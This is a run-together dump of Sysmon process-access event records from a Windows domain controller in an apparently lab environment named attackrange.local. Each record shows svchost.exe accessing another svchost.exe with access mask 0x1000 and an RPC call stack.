13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 